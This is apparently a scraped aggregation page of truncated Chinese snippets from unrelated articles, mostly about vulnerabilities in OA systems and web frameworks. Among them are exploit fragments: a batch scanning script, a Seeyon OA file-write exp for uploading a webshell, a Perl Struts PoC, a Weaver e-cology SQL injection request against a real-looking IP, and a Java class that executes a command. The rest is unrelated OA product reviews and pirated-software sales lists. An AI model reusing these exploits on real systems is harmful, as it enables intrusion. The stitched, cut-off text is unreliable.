批量检测url 在脚本同目录下建立url.txt 放入待检测的URL 运行脚本 # Wednesday, 26 June 2019 # Author:nianhua # Blog:https://github.com/nian-hua/ import re import requests import base64 from multiprocessing import Pool, Manager def send_payload(url): headers = {'Content-Type':…

近期爆出致远 OA 系统的一些版本存在任意文件写入漏洞,远程攻击者在无需登录的情况下可通过向 URL /seeyon/htmlofficeservlet POST 精心构造的数据即可向目标服务器写入任意文件,写入成功后可执行任意系统命令进而控制目标服务器. 目前已知易受攻击的版本: 致远A8-V5协同管理软件 V6.1sp1 致远A8+协同管理软件 V7.0.V7.0sp1.V7.0sp2.V7.0sp3 致远A8+协同管理软件 V7.1 如果成功利用此漏洞的攻击者可以在目标系统上写入任意文件,…

第一步.导入已经制作好的xnl表单文件. 第二步.对每个字段设置相关属性. 1.设置文本属性,录入类型选择文本框. 2.设置日期属性,录入类型选择日期控件. 3.设置引用类型,录入类型选择关联表单--选择对应表单. 4.设置引用子类型,录入类型选择数据关联--关联对象选择母表单--关联属性选择需要的字段. 5.设置流水号,可以选择文本框,在第二步的操作设置里选择相应模式. 6.设置人员,录入类型可以选择选择人员,显示格式选择操作人员所在部门,在第二步的操作设置里选择相应引用. 第三步.操作设置.…

[2017.5.4更新] 昨天曝出了两个比较热门的漏洞,一个是CVE-2016-10033,另一个则为CVE-2017-8295.从描述来看,前者是WordPress Core 4.6一个未经授权的RCE漏洞.不过实际上,这就是去年12月份FreeBuf已经报道的漏洞,因此我们在原文基础上进行更新. 这次漏洞公告就是PHPMailer漏洞利用细节在WordPress核心中的实现.未经授权的攻击者利用漏洞就能实现远程代码执行,针对目标服务器实现即时访问,最终导致目标应用服务器的完全陷落.无需插件或…

S2-057漏洞,于2018年8月22日被曝出,该Struts2 057漏洞存在远程执行系统的命令,尤其使用linux系统,apache环境,影响范围较大,危害性较高,如果被攻击者利用直接提权到服务器管理员权限,网站数据被篡改,数据库被盗取都会发生. 目前我们SINE安全对该S2-057漏洞的测试,发现受影响的版本是Apache Struts 2.3–ApacheStruts2.3.34.Apache Struts2.5–Apache Struts2.5.16等系列版本.官方Apache已经紧急…

原文:https://www.z01.com/down/3484.shtml 再远, 我都不会停息, 因为技术而生, 因为技术而强, 这是逐浪软件的命与根! 全新打造, 三百多项超级功能, 助你十分钟快速构建超级强大的门户, 使每一个信息化时代的个体, 都能拥有自主的信息化平台. 很难, 摒弃百万阻拦, 十余年的站长理想与精益研发, 汇聚成卓越的门户级产品. 从响应式架构.到flex布局,从git底层接入.到微软大数据库层应用, 系统见解,门户AI,大数据开发, 世界五百强选用的CMS门户产品,…

use LWP::UserAgent; undef $/; ){print "Use:poc.pl http://target/index.action\n";exit;} my $url = shift; my $ua = LWP::UserAgent->new; my $req = HTTP::Request->new(POST => $url); my $head = <DATA>; $req->content_type($head); my…

最近各位师傅都在刷这个嘛,原本的exp是上传一个test123456.jsp的命令执行的马子,不过我在试的时候发现替换成C刀一句话出错,原因未知,并且test123456.jsp如果存在的话用原来exp是无法覆盖的. 参考改进了t00ls师傅的代码(https://www.t00ls.net/viewthread ... =%E8%87%B4%E8%BF%9C) A)批量的ip,利用脚本提取从fofa提取 B)上传的文件名和马子密码可以自己定义,摘自t00l师傅的java代码(https://w…

思道OAhttp://www.anyoffice.net微软.NET平台,支持64位 金和OAhttp://www.jinher.com 红帆OAhttp://www.ioffice.cn 致远OAhttp://www.seeyon.com 华天动力OAhttp://www.oa8000.com 万户OAhttp://www.whir.net 九思OAhttp://www.jiusi.net 合强OAhttp://www.aljoin.com 泛微OAhttp://www.weaver.com.…

国内OA 软件市场经过多年的发展,在产品.应用.服务方面都已相对成熟,也出现了众多优秀的OA软件品牌. 据中国软件协会2017年公布的数据显示:泛微OA.致远OA.华天动力OA.蓝凌OA的销售仍稳居OA办公系统软件前四位置,增速远超过其他OA厂商,这4家OA厂商上半年总销售额占市场总额的40%多. 一线OA品牌厂商经过多年的发展,已经占据了国内OA市场的一席之地.而且形成了清晰的市场定位和特色,泛微主打协同管理和移动办公的概念,致远和华天动力主打工作流专家,华天动力突出其技术实力派的特征,蓝凌定…

  最近几年办公信息化的不断发展,走向千家万户(企业),从刚开始的大型公司,政府企业到现在中小企业的加入,市场更加的庞大,产业前进很好,在协同办公这片市场中,有哪些公司独领风骚? 泛微OA:(www.weaversoftware.com) 主要优势:泛微OA软件主打中高端市场,价格较高,由于其产品功能多,在易用性和用户体验上有一定的劣势. 主要劣势:因功能多结构较为复杂,版本通用等特性导致二次开发具有一定的难度. 通达OA:(www.tongda2000.com) 主要优势:产品功能齐全,价格较…

最近新到了一家公司,这家公司做的人力资源管理,需要一个OA系统,所以就让我做一个选型,经过我2周时间的筛选,试用,沟通,测试,最终确定了几款,这个艰辛的路程,在这里记录一下~ 寻找OA的路程------>>>>> 问题: 这个OA是我们自己公司内部使用,还是可能会给客户企业使用? 内部使用,将来可能卖给客户 需要web端和手机端都有吗?  是的 现在使用的OA系统是什么产品?   是自己搭建的CCFlow(JFlow),无移动端 一些资源: 开源软件网:https://www…

一,基础学习 01.基础学习 [[编码总结]] [[JSON三种数据解析方法]] [[js加密,解密]] [[Internet保留地址和非保留地址.内网和公网.VNC和UltraVN]] 代理 [[SOCKS4.SOCKS5和HTTP代理]] [[Windows - Netch 使用教程]] [[Netch设置端口ip进行转发流量]] [[全能终端神器--MobaXterm]] 通信协议 [[IIOP-百度百科]] 互联网内部对象请求代理协议 二.信息收集 02.信息收集 1.[[信息收集-汇总…

ebe1 Email:kefu007@vip.qq.com 89600 VSA 软件解调和矢量信号分析的综合工具 Aspen Plus大型通用流程模拟系统 AutoAdvance Baccarat-P[正版路单]微信版2017年版本 Brill Formulation柏睿尔配方软件 CAE ITE 1.0 claricom软件 cutpro?为金属切削仿真软件-MAL DHI WEST 污水处理厂模拟软件 DROC数字X线图像采集及处理系统 ECGLab Holter 12.NET FANUC数…

目前我碰到好几个案例是希望将客户以后的OA系统与Exchange中的日历系统相结合,比如致远或者泛微的OA系统. 客户的需求如下: 1.有了OA系统 2.客户使用Outlook当邮件客户端 3.客户希望在OA中定好会议室,能够同步到Exchange的日历里. 详细技术文档如下 关于Office365日历开发我们可以使用一下两种方式: 1.使用Office 365 API 使用Office 365 API,您可以使用日历 API 中的 CalendarGroup.Calendar 和 Event…

在当今无边界组织的商业背景下,企业与员工关系已经转化为联盟关系,以往通过工作场所.劳动合同等约束的形式已经逐步弱化,管理行为空前复杂,OA正是将一个个散点整合起来的看不见的手.那么,推动OA发展的核心要素是什么?中国OA到底是如何发展起来的,分哪些阶段?以后将去向何处? 一.OA发展的驱动力 办公自动化(OA,Office Automation)其主要使命是依托计算机技术,提高计划.组织.领导.控制等管理行为的效率和效果.因此,OA的成长有两个引擎:一方面是硬性技术的不断更新,另一方则是管理活动…

OA协同办公软件: 泛微软件. 九思软件. 华天动力. 万户OA.:北京万户网络技术有限公司创立于1998年2月,是北京华宇软件股份有限公司(股票简称:“华宇软件”,股票代码:300271)的全资子公司,是中国领先的协同管理软件产品和服务提供商,是协同软件国家行业标准编制组长单位. 致远软件. 金和软件(NET技术).红帆软件(NET技术).…

本文结合一线IT人士分享OA实施经验,单纯地讲述OA的选型与实施,为相关经验较少的IT人士提供真正的帮助. 一.如何选择OA系统 说起OA选型,稳定性.易用性.灵活性.成本和服务少不了.但是,只了解这些和一无所知是一样的,因为要能根据需求来选择. 下面的内容均是真实案例.包括了选型的原因和后期使用的体验. 不少CIO也认为小企业可以选择钉钉,因为其考勤.即时通讯.审批流还是很强大的. 其实大部分CIO都认为OA的品牌不重要.一位CIO说:OA系统功能方面,各厂家都大同小异,主要看重行业的实施经验…

Linux堆溢出漏洞利用之unlink 作者:走位@阿里聚安全 0 前言 之前我们深入了解了glibc malloc的运行机制(文章链接请看文末▼),下面就让我们开始真正的堆溢出漏洞利用学习吧.说实话,写这类文章,我是比较怂的,因为我当前从事的工作跟漏洞挖掘完全无关,学习这部分知识也纯粹是个人爱好,于周末无聊时打发下时间,甚至我最初的目标也仅仅是能快速看懂.复现各种漏洞利用POC而已…鉴于此,后续的文章大致会由两种内容构成:1)各种相关文章的总结,再提炼:2)某些好文章的翻译及拓展.本文两者皆有…

通过多线程资源竞争的手段同时上传两个头像,就可以在Apache+Rails环境下实现远程代码执行.这并不是天方夜谭,同时我相信许多文件上传系统都会有这个漏洞……这是一个非常有趣的安全实验,一起来看看吧! FreeBuf小科普: Rails:某种基于Ruby语言的高效WEB框架.Paperclip:Thoughtbot公司出品的Rails图片上传插件..htaccess:Apache服务器中的一个配置文件,笼统地说,.htaccess可以帮我们实现包括:文件夹密码保护.用户自动重定向.自定义错误页…

目前研究人员正抓紧检查 Linux 内核的安全问题,与此同时,微软也预计将在本月补丁日公开介绍 Windows 操作系统的相关变更. 而 Linux 和 Windows 系统的这些更新势必会对 Intel 的产品线造成冲击,预计可能会出现 5% 到 30% 的性能下降,具体还和处理器型号有关. 苹果的 macOS 也将需要进行更新,此缺陷也影响 Intel x86-64 的硬件,并且通过 microcode 更新无法解决此问题,必须是在系统级别的软件中进行修复,或者购买新的处理器. 过去十多年中…

1.本公司使用的是致远A8,首先在本机上准备好A8环境,java环境(jre1.8.0_131),eclipse版本(建议用eclipseInstaller下载最新的NEON版本),安装致远ide插件:http://open.seeyon.com/seeyon/com.seeyon.devtoolsdk.site 2.配置等 bin目录: [startup.bat]为产品的启动项 [catalina_custom.bat]需要远程调试时,在该批处理中,右键编辑,在文档末尾加上: -Xdebug…

0x01 CSRF的攻击原理 CSRF 百度上的意思是跨站请求伪造,其实最简单的理解我们可以这么讲,假如一个微博关注用户的一个功能,存在CSRF漏洞,那么此时黑客只需要伪造一个页面让受害者间接或者直接触发,然后这个恶意页面就可以使用受害者的微博权限去关注其他的人微博账户.CSRF只要被批量化利用起来其危害还是比较大的. 举个例子,比如笔者在新浪首页执行了一次搜索请求. 可以看到这里有个Referer的信息,Referer也就是请求来源地址,也就是说这个请求是从http://www.sina.co…

1 基础知识1.1 网络熟悉常见网络协议:https://www.ietf.org/standards/rfcs/1.2 操作系统1.3 编程2 恶意软件分析2.1 分类2.1.1 木马2.1.2 Botnet2.1.3 挖矿2.1.4 勒索软件2.1.5 后门2.1.6 病毒2.1.7 蠕虫2.2 外部资源• VirusTotalhttps://www.virustotal.com/#/home/upload • 样本下载https://www.malware-traffic-analysis…

2019年4月4日,阿里云安全应急响应中心监测到Confluence 官方发布安全更新指出,Widget Connector 存在服务端模板注入漏洞,攻击者能利用此漏洞实现目录穿越遍历甚至远程命令执行.4月10日远程命令执行PoC被公开,阿里云监测到此漏洞被大规模利用,4月12日凌晨攻击流量达到第二次高峰. 4月6日出现第一次大规模攻击,全天攻击次数超过5000次,阿里云WAF默认规则均成功防御.攻击特征为任意文件读取,攻击者通过构造特定请求读取本地敏感文件信息. 直到4月7日,第一波攻击结束,…

Apache-Tomcat-Ajp漏洞(CVE-2020-1938)漏洞复现 0X00漏洞简介 Apache与Tomcat都是Apache开源组织开发的用于处理HTTP服务的项目,两者都是免费的,都可以做为独立的Web服务器运行. Apache Tomcat服务器存在文件包含漏洞,攻击者可利用该漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件,如:webapp 配置文件或源代码等. 由于Tomcat默认开启的AJP服务(8009端口)存在一处文件包含缺陷,攻击者可构造恶意的请…

0x00概述 该漏洞是由于OA系统的WorkflowCenterTreeData接口在收到用户输入的时候未进行安全过滤,oracle数据库传入恶意SQL语句,导致SQL漏洞. 0x01影响范围 使用oracle数据库的泛微 e-cology OA 系统 poc POST /mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333 HTTP/1.1 Host:122.224.179.98:443 User-Agent: M…

重要漏洞利用poc及版本 我是从github上的参考中直接copy的exp,这个类就是要注入的类 import java.lang.Runtime; import java.lang.Process; public class Exploit { public Exploit() { try{ // 要执行的命令 String commands = "calc.exe"; Process pc = Runtime.getRuntime().exec(commands); pc.wait…

环境搭建 docker pull medicean/vulapps:s_shiro_1 docker run -d -p 80:8080 medicean/vulapps:s_shiro_1 # 80是指靶机端口,可随意修改 Windows安装模块:pip install pycryptodome 挖掘思路 判断漏洞 登录的时候发现 rememberMe 参数,判断是 shiro (外网可以访问的情况下)利用在线POC进行验证:http://sbd.ximcx.cn/ShiroRce/ 利用 P…

Email:kefu007@vip.qq.com 软件每天有更新.请用Ctrl+F键搜索您需要的软件..如果你找不到你需要的软件可以联系客户服务人员帮您找! 海拉之光LucidShape光学设计仿真分析软件 V1.11.0 VectorSoft DspCnc雕刻机系统 ComputerForensic取证软件 安则计算机终端保密检查工具 ABB ECT ABB Excitation Control Terminal 用友T3 11.31  T6 6.1  U8V10.1 天影Genius标清高清…